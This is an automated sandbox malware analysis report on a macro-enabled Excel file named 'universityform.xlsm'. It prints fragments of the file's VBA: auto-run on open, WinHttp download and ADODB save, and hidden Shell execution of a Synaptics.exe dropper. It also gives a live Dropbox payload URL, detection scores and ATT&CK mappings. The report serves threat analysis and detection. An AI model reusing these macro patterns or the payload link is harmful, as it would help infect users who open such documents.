Source: universityform.xlsmOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: universityform.xlsmOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function SaveAsInj, String environ: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"Name: SaveAsInj
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function RegKeyRead, String wscript: Set myWS = CreateObject("WScript.Shell")Name: RegKeyRead
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function RegKeyExists, String wscript: Set myWS = CreateObject("WScript.Shell")Name: RegKeyExists
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function RegKeySave, String wscript: Set myWS = CreateObject("WScript.Shell")Name: RegKeySave
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: TMP = Environ("Temp") & "\~$cache1.exe"Name: MPS
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") ThenName: MPS
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHideName: MPS
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: Elseif FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") ThenName: MPS
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHideName: MPS
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function FDW, String winhttp.winhttprequest: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")Name: FDW
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function FDW, String winhttp.winhttprequest: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")Name: FDW
Source: universityform.xlsmStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function FDW, found possibly 'ADODB.Stream' functions open, savetofile, writeName: FDW
Source: universityform.xlsmStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function FDW, found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, sendName: FDW
Source: universityform.xlsmStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXECOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXECOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}\InProcServer32Jump to behavior
Source: universityform.xlsmOLE, VBA macro line: Private Sub Workbook_Open()
Source: universityform.xlsmOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_BeforeCloseName: Workbook_BeforeClose
Source: universityform.xlsmOLE indicator, VBA macros: true
Source: ~DFDDA5A1F165805A16.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF3FE25D284802F803.TMP.15.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engineClassification label: mal84.expl.evad.winXLSM@4/8@3/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$universityform.xlsmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{F9082F4E-3DFD-4685-B7A0-EAC0FB4E830D} - OProcSessId.datJump to behavior
Source: universityform.xlsmOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: universityform.xlsmVirustotal: Detection: 66%
Source: universityform.xlsmReversingLabs: Detection: 68%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\universityform.xlsm"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: universityform.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp2.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp9.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp3.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp4.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp5.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp6.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp7.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp8.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp1.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: ~DFDDA5A1F165805A16.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1012Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: universityform.xlsmOLE indicator, VBA stomping: true
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information42
Scripting
Valid Accounts3
Exploitation for Client Execution
42
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Obfuscated Files or Information
1
Extra Window Memory Injection
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture114
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
universityform.xlsm66%VirustotalBrowse
universityform.xlsm68%ReversingLabsDocument-Word.Trojan.Orcinius
universityform.xlsm100%AviraW2000M/Dldr.Agent.17651006
universityform.xlsm100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    docs.google.com
    142.250.185.174
    truefalse
      high
      s-part-0017.t-0009.t-msedge.net
      13.107.246.45
      truefalse
        high
        www-env.dropbox-dns.com
        162.125.66.18
        truefalse
          high
          www.dropbox.com
          unknown
          unknownfalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1false
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              162.125.66.18
              www-env.dropbox-dns.comUnited States
              19679DROPBOXUSfalse
              142.250.185.174
              docs.google.comUnited States
              15169GOOGLEUSfalse
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1582321
              Start date and time:2024-12-30 10:59:10 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 47s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • GSI enabled (VBA)
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:universityform.xlsm
              Detection:MAL
              Classification:mal84.expl.evad.winXLSM@4/8@3/2
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .xlsm
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 184.28.90.27, 52.109.68.129, 199.232.210.172, 20.189.173.11, 52.109.32.97, 13.89.178.27, 13.107.246.45, 20.190.159.4, 52.149.20.212, 4.245.163.56
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, onedscolprdwus10.westus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ukw-azsc-config.officeapps.live.com, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedscolprdcus03.centralus.cloudapp.azure.com, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.micros
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              TimeTypeDescription
              05:01:05API Interceptor1033x Sleep call for process: splwow64.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              162.125.66.18https://www.dropbox.com/l/scl/AACfaxhMBCajpVJfxiny0jrZK6hv1s8xd2MGet hashmaliciousUnknownBrowse
                bose18mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                  hnbose1711.batGet hashmaliciousAbobus ObfuscatorBrowse
                    hnl2bose13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                      2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                        13jhsfbose.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                          scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                              18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  s-part-0017.t-0009.t-msedge.nethttps://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                  • 13.107.246.45
                                  phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                  • 13.107.246.45
                                  installer64v9.5.7.msiGet hashmaliciousUnknownBrowse
                                  • 13.107.246.45
                                  zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                  • 13.107.246.45
                                  017069451a4dbc523a1165a2f1bd361a762bb40856778.exeGet hashmaliciousUnknownBrowse
                                  • 13.107.246.45
                                  http://nemoinsure.comGet hashmaliciousUnknownBrowse
                                  • 13.107.246.45
                                  https://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlDGet hashmaliciousUnknownBrowse
                                  • 13.107.246.45
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 13.107.246.45
                                  Kellyb Timesheet Report.pdfGet hashmaliciousHTMLPhisherBrowse
                                  • 13.107.246.45
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 13.107.246.45
                                  bg.microsoft.map.fastly.netPayment-Order #24560274 for 8,380 USD.exeGet hashmaliciousAsyncRAT, PureLog Stealer, zgRATBrowse
                                  • 199.232.214.172
                                  SecuredOnedrive.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                  • 199.232.214.172
                                  dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                  • 199.232.210.172
                                  Installer eSPT Masa PPh versi 2.0#U007e26022009.exeGet hashmaliciousBlackMoonBrowse
                                  • 199.232.210.172
                                  Installer eSPT Masa PPh versi 2.0#U007e26022009.exeGet hashmaliciousBlackMoonBrowse
                                  • 199.232.214.172
                                  SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                  • 199.232.214.172
                                  3KFFG52TBI.exeGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  a2mNMrPxow.exeGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  tzA45NGAW4.lnkGet hashmaliciousUnknownBrowse
                                  • 199.232.210.172
                                  sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  www-env.dropbox-dns.comFLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                  • 162.125.65.18
                                  https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0Get hashmaliciousUnknownBrowse
                                  • 162.125.65.18
                                  hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                  • 162.125.65.18
                                  Setup.exeGet hashmaliciousUnknownBrowse
                                  • 162.125.65.18
                                  Setup.exeGet hashmaliciousUnknownBrowse
                                  • 162.125.69.18
                                  https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                                  • 162.125.65.18
                                  hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                  • 162.125.69.18
                                  slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                  • 162.125.69.18
                                  De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                  • 162.125.69.18
                                  fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                  • 162.125.69.18
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  DROPBOXUSFLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                  • 162.125.65.18
                                  https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0Get hashmaliciousUnknownBrowse
                                  • 162.125.21.3
                                  hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                  • 162.125.65.18
                                  Setup.exeGet hashmaliciousUnknownBrowse
                                  • 162.125.69.15
                                  Setup.exeGet hashmaliciousUnknownBrowse
                                  • 162.125.69.15
                                  la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                  • 162.125.232.208
                                  https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                                  • 162.125.65.18
                                  hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                  • 162.125.69.18
                                  slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                  • 162.125.69.18
